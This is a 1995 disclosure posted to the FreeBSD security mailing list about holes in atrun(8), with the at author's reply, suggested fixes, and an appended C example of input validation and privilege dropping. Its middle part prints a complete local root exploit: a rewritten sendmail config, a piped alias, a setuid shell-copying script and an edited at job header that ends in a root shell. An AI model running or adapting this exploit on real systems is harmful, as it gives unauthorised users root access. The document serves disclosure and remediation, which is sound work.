Date:      Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300)
From:      adam <adam@math.tau.ac.il>
To:        freebsd-security@FreeBSD.org
Subject:   atrun hole
Message-ID:  <199504041320.QAA09588@lune.math.tau.ac.il>


There are some security problems in the FreeBSD atrun(8) system,
one of which allows root access to be obtained easily.

First, before running a job, atrun takes an 8 character string
from the at job file, assumes it is the login of someone to mail,
and passes it to sendmail without any checks.  The code says
that atrun is run setuid root, and therefore it tries to remain
secure by using a scheme which revokes privileges based on changing
the real and effective uids of the process.  Note, *uids*.
However, since (both according to the man page, and the way FreeBSD
comes set up) atrun is not setuid root, but executed from /etc/crontab -- 
it is really run by the root uid.  This means that no matter what 
atrun does, it executes sendmail as root, and there's the hole, 
which allows root to be broken.  An exploit for this problem is 
included below.

The second problem is that atrun only calls setgid() and setuid()
to reduce privileges, and doesn't call initgroups().  This leaves 
jobs run by atrun being in every group root is in.  

The author of the program, Thomas Koenig <ig25@rz.uni-karlsruhe.de>,
has released a better version of the system, at-2.7a, for Linux.
It fixes all of these problems.  Therefore, as an immediate fix,
I suggest obtaining and installing that version, though I'm unsure
of how smoothly it will go, considering it's a Linux program.

    ftp://sunsite.unc.edu/pub/Linux/system/Daemons/at-2.7a.tgz

He writes --

``If it's ok by the FreeBSD people, I'll put out version 2.8 (which
checks for the presence of a '-' in the name to be mailed to,
and then doesn't invoke the mailer) up with a BSD copyright again,
but that'll take a bit of time.''

And, later --

Subject: Re: atrun hole
To: adam@math.tau.ac.il (adam)
Date: Tue, 4 Apr 1995 01:20:36 +0200 (MET DST)
In-Reply-To: <199503311834.UAA29332@lune.math.tau.ac.il> from "adam" at Mar 31, 95 08:34:34 pm
From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 324

An additional thought...

If there's any problem because of the GPL copyright on at 2.7a, I, with
this mail, give the *BSD maintainers permission to put it under the same
BSD-style license which I've slapped on 2.5 or whatever old version it
was I sent them.

Please feel free to forward this as appropriate.

Thomas Koenig

===

The following works provided the at jobs directory (/var/at/jobs)
is accessible to users.  It is with FreeBSD.  It is set to mode
0700 with at-2.7a.

5:53pm  [eden:~] % whoami
adam
5:53pm  [eden:~] % cd /tmp
5:53pm  [eden:/tmp] % sed -e 's/Og1/Og0/' -e 's/Ou1/Ou0/' 
 -e 's/etc\/aliases/tmp\/aliases/' /etc/sendmail.cf > c
5:54pm  [eden:/tmp] % cat > aliases
postmaster: "|/tmp/rootme"
root: "|/tmp/rootme"
adam: "|/tmp/rootme"
^D
5:55pm  [eden:/tmp] % /usr/sbin/sendmail -bi -oA/tmp/aliases -oQ/tmp
/tmp/aliases: 3 aliases, longest 14 bytes, 60 bytes total
5:55pm  [eden:/tmp] % cat > rootme
#!/bin/sh
/bin/cp /bin/sh /tmp/sh
/bin/chmod 6777 /tmp/sh
^D
5:55pm  [eden:/tmp] % chmod 755 rootme
5:56pm  [eden:/tmp] % at now + 1 min
fooz
^D
Job a00ca9a79.000 will be executed using /bin/sh
5:56pm  [eden:/tmp] % joe /var/at/jobs/a00ca9a79.000
5:56pm  [eden:/tmp] % cat /var/at/jobs/a00ca9a79.000
#! /bin/sh
# mail     -C/tmp/c 1
umask 22
HOME=\/home\/adam; export HOME
SHELL=\/usr\/local\/bin\/tcsh; export SHELL
LOGNAME=adam; export LOGNAME
USER=adam; export USER
PATH=\/home\/adam\/bin\:\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin\:\/usr\/local\:\/usr\/local\/bin; export PATH
HOSTTYPE=FreeBSD; export HOSTTYPE
VENDOR=intel; export VENDOR
OSTYPE=FreeBSD; export OSTYPE
MACHTYPE=i386; export MACHTYPE
SHLVL=1; export SHLVL
PWD=\/tmp; export PWD
HOST=eden; export HOST
PAGER=less; export PAGER
VISUAL=joe; export VISUAL
MANPATH=\/usr\/share\/man\:\/usr\/local\/man\:\/usr\/man\:\/home\/adam\/man; export MANPATH
cd /tmp
fooz
5:56pm  [eden:/tmp] % sleep 240
DING!  [eden:/tmp] % /tmp/sh
# whoami
root
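The two defects described at the top of this message, a mail name taken from the job header and handed to sendmail unchecked, and a privilege drop that never calls initgroups(), are what the '-' check in 2.8 and the fixes in at-2.7a address. What follows is an added C example of those defensive checks, not code from atrun, at-2.7a or Thomas Koenig; the function names, the accepted character set, and the 8-character limit taken from the report are this example's own assumptions.

```c
#define _DEFAULT_SOURCE
#include <ctype.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Largest mail name atrun reads from the job header (8 characters, per the report). */
#define MAILNAME_MAX 8

/* Reject a mail name that could be parsed by the mailer as an option or
 * is otherwise not a plain login: empty, too long, leading '-', or any
 * character outside [A-Za-z0-9_.-].  Returns 1 if the name is safe to use. */
int valid_mailname(const char *name)
{
    if (name == NULL || name[0] == '\0' || name[0] == '-')
        return 0;
    size_t len = strlen(name);
    if (len > MAILNAME_MAX)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Drop root to the job owner in the right order: supplementary groups
 * first (initgroups replaces root's group list), then gid, then uid, every
 * call checked, and verify the drop took effect before the job runs.
 * Returns 0 on success, -1 if the job must not be run. */
int drop_privileges(const char *login)
{
    struct passwd *pw = getpwnam(login);
    if (pw == NULL)
        return -1;
    if (initgroups(pw->pw_name, pw->pw_gid) != 0)
        return -1;
    if (setgid(pw->pw_gid) != 0 || setuid(pw->pw_uid) != 0)
        return -1;
    /* Confirm real and effective ids changed and root cannot be regained. */
    if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid ||
        getgid() != pw->pw_gid || getegid() != pw->pw_gid)
        return -1;
    if (pw->pw_uid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}
```

With the header value from the transcript above, valid_mailname("-C/tmp/c") returns 0, so a job carrying it would never reach sendmail.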